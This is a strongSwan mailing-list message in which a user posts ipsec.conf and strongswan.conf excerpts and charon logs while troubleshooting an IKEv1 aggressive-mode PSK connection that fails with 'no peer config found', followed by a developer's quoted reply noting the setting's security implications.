[strongSwan] IKEv1 PSK with group name?

Tony Zhou tonytzhou at gmail.com
Sat May 4 18:27:40 CEST 2013 

Hi Martin,

Here's some slightly more detailed logs:

ipsec.conf:
conn IPSec-IKEv1
         keyexchange=ikev1
         aggressive=yes
         auto=add
         left=server.ip.address
         leftsubnet=0.0.0.0/0
         right=%any
         rightsourceip=client.ip.address/24
         rightid=@groupid
         rightauth=psk
         rightauth2=xauth-eap

strongswan.conf:
charon {

	#...

         # enable aggressive mode psk
         i_dont_care_about_security_and_use_aggressive_mode_psk = yes

         # ...
}


Strongswan parsing configuration file:

May  5 01:15:28 area11 charon: 10[CFG] received stroke: add connection 
'IPSec-IKEv1'
May  5 01:15:28 area11 charon: 10[CFG] conn IPSec-IKEv1
May  5 01:15:28 area11 charon: 10[CFG]   left=server.ip.address
May  5 01:15:28 area11 charon: 10[CFG]   leftsubnet=0.0.0.0/0
May  5 01:15:28 area11 charon: 10[CFG]   leftsourceip=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftdns=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftauth=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftauth2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftid=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftid2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftrsakey=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftcert=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftcert2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftca=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftca2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftgroups=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftgroups2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   leftupdown=(null)
May  5 01:15:28 area11 charon: 10[CFG]   right=%any
May  5 01:15:28 area11 charon: 10[CFG]   rightsubnet=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightsourceip=client.ip.address/24
May  5 01:15:28 area11 charon: 10[CFG]   rightdns=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightauth=psk
May  5 01:15:28 area11 charon: 10[CFG]   rightauth2=xauth-eap
May  5 01:15:28 area11 charon: 10[CFG]   rightid=@groupid
May  5 01:15:28 area11 charon: 10[CFG]   rightid2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightrsakey=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightcert=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightcert2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightca=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightca2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightgroups=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightgroups2=(null)
May  5 01:15:28 area11 charon: 10[CFG]   rightupdown=(null)
May  5 01:15:28 area11 charon: 10[CFG]   eap_identity=(null)
May  5 01:15:28 area11 charon: 10[CFG]   aaa_identity=(null)
May  5 01:15:28 area11 charon: 10[CFG]   xauth_identity=(null)
May  5 01:15:28 area11 charon: 10[CFG] 
ike=aes128-sha1-modp2048,3des-sha1-modp1536
May  5 01:15:28 area11 charon: 10[CFG]   esp=aes128-sha1,3des-sha1
May  5 01:15:28 area11 charon: 10[CFG]   dpddelay=30
May  5 01:15:28 area11 charon: 10[CFG]   dpdtimeout=150
May  5 01:15:28 area11 charon: 10[CFG]   dpdaction=0
May  5 01:15:28 area11 charon: 10[CFG]   closeaction=0
May  5 01:15:28 area11 charon: 10[CFG]   mediation=no
May  5 01:15:28 area11 charon: 10[CFG]   mediated_by=(null)
May  5 01:15:28 area11 charon: 10[CFG]   me_peerid=(null)
May  5 01:15:28 area11 charon: 10[CFG]   keyexchange=ikev1
May  5 01:15:28 area11 charon: 10[CFG] adding virtual IP address pool 
client.ip.address/24
May  5 01:15:28 area11 charon: 10[CFG] added configuration 'IPSec-IKEv1'

Note that it didn't mention that aggressive=yes is parsed.

Client connection log:
May  5 01:15:36 area11 charon: 02[ENC] parsed AGGRESSIVE request 0 [ SA 
KE No ID V V V V V V V V V ]
May  5 01:15:36 area11 charon: 02[CFG] looking for an ike config for 
server.ip.address...road.warrior.ip.address
May  5 01:15:36 area11 charon: 02[CFG]   candidate: 
server.ip.address...%any, prio 13
May  5 01:15:36 area11 charon: 02[CFG] found matching ike config: 
server.ip.address...%any with prio 13
May  5 01:15:36 area11 charon: 02[IKE] received XAuth vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received Cisco Unity vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received NAT-T (RFC 3947) vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received 
draft-ietf-ipsec-nat-t-ike-03 vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received 
draft-ietf-ipsec-nat-t-ike-02\n vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received 
draft-ietf-ipsec-nat-t-ike-02 vendor ID
May  5 01:15:36 area11 charon: 02[ENC] received unknown vendor ID: 
16:f6:ca:16:e4:a4:06:6d:83:82:1a:0f:0a:ea:a8:62
May  5 01:15:36 area11 charon: 02[IKE] received 
draft-ietf-ipsec-nat-t-ike-00 vendor ID
May  5 01:15:36 area11 charon: 02[IKE] received DPD vendor ID
May  5 01:15:36 area11 charon: 02[IKE] road.warrior.ip.address is 
initiating a Aggressive Mode IKE_SA
May  5 01:15:36 area11 charon: 02[IKE] IKE_SA (unnamed)[1] state change: 
CREATED => CONNECTING
...
May  5 01:15:36 area11 charon: 02[CFG] selected proposal: 
IKE:AES_CBC_256/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
May  5 01:15:36 area11 charon: 02[CFG] looking for XAuthInitPSK peer 
configs matching server.ip.address...road.warrior.ip.address[groupid]
May  5 01:15:36 area11 charon: 02[IKE] no peer config found
May  5 01:15:36 area11 charon: 02[IKE] queueing INFORMATIONAL task
May  5 01:15:36 area11 charon: 02[IKE] activating new tasks
May  5 01:15:36 area11 charon: 02[IKE]   activating INFORMATIONAL task
May  5 01:15:36 area11 charon: 02[ENC] generating INFORMATIONAL_V1 
request 3392550384 [ N(AUTH_FAILED) ]
May  5 01:15:36 area11 charon: 02[NET] sending packet: from 
server.ip.address[500] to road.warrior.ip.address[48330] (56 bytes)
May  5 01:15:36 area11 charon: 02[IKE] IKE_SA (unnamed)[1] state change: 
CONNECTING => DESTROYING

Could it be possible that since Strongswan didn't parse the 
aggressive=yes term in the config, when it meets clients using 
aggressive mode, Strongswan cannot find a matching configuration?

Thanks,
TZ

On 5/3/2013 11:40 AM, Martin Willi wrote:
> Hi,
>
>> 12[IKE] client.ip.address is initiating a Aggressive Mode IKE_SA
>> 12[CFG] looking for XAuthInitPSK peer configs matching server.ip.address...client.ip.address[group]
>> 12[IKE] no peer config found
>
> I don't see the "aggressive" keyword in your ipsec.conf. Have you set
> it? man ipsec.conf for details.
>
> Also, to support Aggressive Mode PSK as responder, you'll have to
> confirm you are aware of the security implications and enable "weakSwan"
> mode using
>      charon.i_dont_care_about_security_and_use_aggressive_mode_psk
> in strongswan.conf, see that manpage for details.
>
> Regards
> Martin
>

More information about the Users mailing list